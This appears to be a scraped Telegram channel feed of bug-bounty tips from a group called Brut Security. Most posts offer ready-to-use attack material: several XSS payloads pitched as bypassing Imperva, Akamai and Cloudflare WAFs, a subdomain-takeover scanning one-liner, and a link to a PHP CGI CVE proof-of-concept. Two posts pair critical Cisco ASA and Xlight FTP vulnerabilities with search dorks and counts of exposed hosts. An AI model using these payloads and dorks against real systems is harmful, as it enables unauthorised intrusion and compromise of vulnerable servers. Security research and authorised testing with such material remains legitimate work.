Brut Security
14.6K subscribers
907 photos
73 videos
287 files
962 links
โœ…Queries: @wtf_brut
๐Ÿ›ƒWhatsApp: wa.link/brutsecurity
๐ŸˆดTraining: brutsec.com
๐Ÿ“จE-mail: [email protected]
Download Telegram
POC for CVE-2024-4577 PHP CGI Argument Injection ๐Ÿ”ฅ ๐Ÿ”ฅ ๐Ÿ”ฅ

Nuclei Template:
https://github.com/11whoami99/CVE-2024-4577/blob/main/CVE-2024-4577.yaml
1โค9๐Ÿ‘2
Subdomain Takeover POC :
subfinder -d domain | httpx -silent > subdomains.txt ; nuclei -t /root/nuclei-templates/http/takeovers -l subdomains.txt
๐Ÿ‘8โค1
80% bug bounties is about understanding the application/framework/protocol and (knowing about what exactly are you doing or if it's actually worth doing)
๐Ÿ‘29๐Ÿ”ฅ4๐Ÿ—ฟ3โค1
CVE-2024-20329: Improper Neutralization of Command Delimiters in Cisco ASA, 9.9 rating ๐Ÿ”ฅ๐Ÿ”ฅ๐Ÿ”ฅ

The vulnerability allows an attacker with low privileges to remotely execute commands via SSH and thus gain full control of the system.

More then 140k instances at Netlas.io:
๐Ÿ‘‰ Link: https://nt.ls/Rfjme
๐Ÿ‘‰ Dork: http.body:"/+CSCOE+/logon.html"

Vendor's advisory: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asa-ssh-rce-gRAuPEUF
โค3๐Ÿ—ฟ2๐Ÿ‘1
Happy Sunday ๐Ÿซถ
๐Ÿ—ฟ22๐Ÿ”ฅ4โค2๐Ÿ‘1
Wordpress juicy endpoints #bugbountytips
1๐Ÿ‘9
โšก๏ธFound a security vulnerability in any site?
โœ…Check if it has a public bug bounty program:

https://xplo1t-sec.github.io/bugbounty-lookup/

#BugBounty #bugbountytips
1โค6๐Ÿ”ฅ3๐Ÿณ1
A solid XSS payload that bypasses Imperva WAF โš™๏ธ

<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click

#infosec #cybersec #bugbountytips
1๐Ÿ”ฅ9๐Ÿณ3
Reflected XSS Akami Waf Bypass in Redirect Parameter using HTTP Parameter Pollution and Double URL Encode:โš™๏ธ

/login?ReturnUrl=javascript:1&ReturnUrl=%2561%256c%2565%2572%2574%2528%2564%256f%2563%2575%256d%2565%256e%2574%252e%2564%256f%256d%2561%2569%256e%2529
1๐Ÿ”ฅ5๐Ÿ‘4๐Ÿณ2
Cloudflare #XSS WAF Bypass by @nav1n0x

Payload:
"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F 


#cybersec #bugbountytips #infosec
1๐Ÿ‘10๐Ÿ—ฟ3๐Ÿณ1
an XSS payload to bypass some waf & filters in Firefox

<input accesskey=X onclick="self['wind'+'ow']['one'+'rror']=alert;throw 1337;">


#infosec #cybersec #bugbountytips
1โค9
Retrieves DNS records without any authentication

curl -s "https://api.hackertarget.com/dnslookup/?q=example.com"


Replace example.com with the target domain.
26๐Ÿ—ฟ12โค7๐Ÿ‘2
Brut Security pinned ยซ๐ŸšจIf you're looking for accurate IoT results, then Sign Up On @Netlas ๐Ÿ˜ฎโ€๐Ÿ’จhttps://app.netlas.io/ref/9cc61538/ยป
1)Finding a Hidden GraphQL Endpoint
https://medium.com/@codingbolt.in/finding-a-hidden-graphql-endpoint-56001ab29f85

2)My 2nd bounty : Referer-based access control + Response manipulation
https://medium.com/@adebayosec/my-2nd-bounty-referer-based-access-control-response-manipulation-2ab7f54d083f

3)CSRF Bypass Using Domain Confusion Leads To ATO
https://infosecwriteups.com/csrf-bypass-using-domain-confusion-leads-to-ato-ac682dd17722

4)Linear-feedback. Shift. Register
https://cyancharley.medium.com/linear-feedback-shift-register-ac6fc3298c35

5)ASCWG Reverse Engineering challenges
https://s3dny.medium.com/ascwg-reverse-engineering-challenges-778e47a5be80

6)picoCTF: No SQL Injection
https://medium.com/@baracarlo/picoctf-no-sql-injection-93a253cc4d09

7)Sunset:1 Walkthrough
https://medium.com/@nikhilbwr34/sunset-1-walkthrough-d124d06fcc93

8)Gixposed is a powerful command-line tool designed to search the commit history of Git repositories for sensitive information, such as API keys and access tokens
https://github.com/WH1T3-E4GL3/gixposed

9)MM-ReverseIPLookup created to take a domain name and find all (A) records associated with an IP address Using Free Multiple sources,
https://github.com/FINAL094/MM-ReverseIPLookup

10)Hidden secrets and urls in JS Mass hunting || Bug bounty POC
https://www.youtube.com/watch?v=HAAG5_mSxdk
๐Ÿ‘7โค2
CVE-2024-46483: Integer Overflow in Xlight FTP Server, 9.8 rating ๐Ÿ”ฅ

By overflowing the variable, an attacker could cause remote code execution on the host or a denial of service.

Search at Netlas.io:
๐Ÿ‘‰ Link: https://nt.ls/M8D2R
๐Ÿ‘‰ Dork: \*.banner:"Xlight" OR raw_tcp.response_data:"Xlight"

Read more: https://github.com/kn32/cve-2024-46483
๐Ÿ‘3โค2
โšก๏ธParameter that could be vulnerable to server side request forgery !
โค13๐Ÿ‘3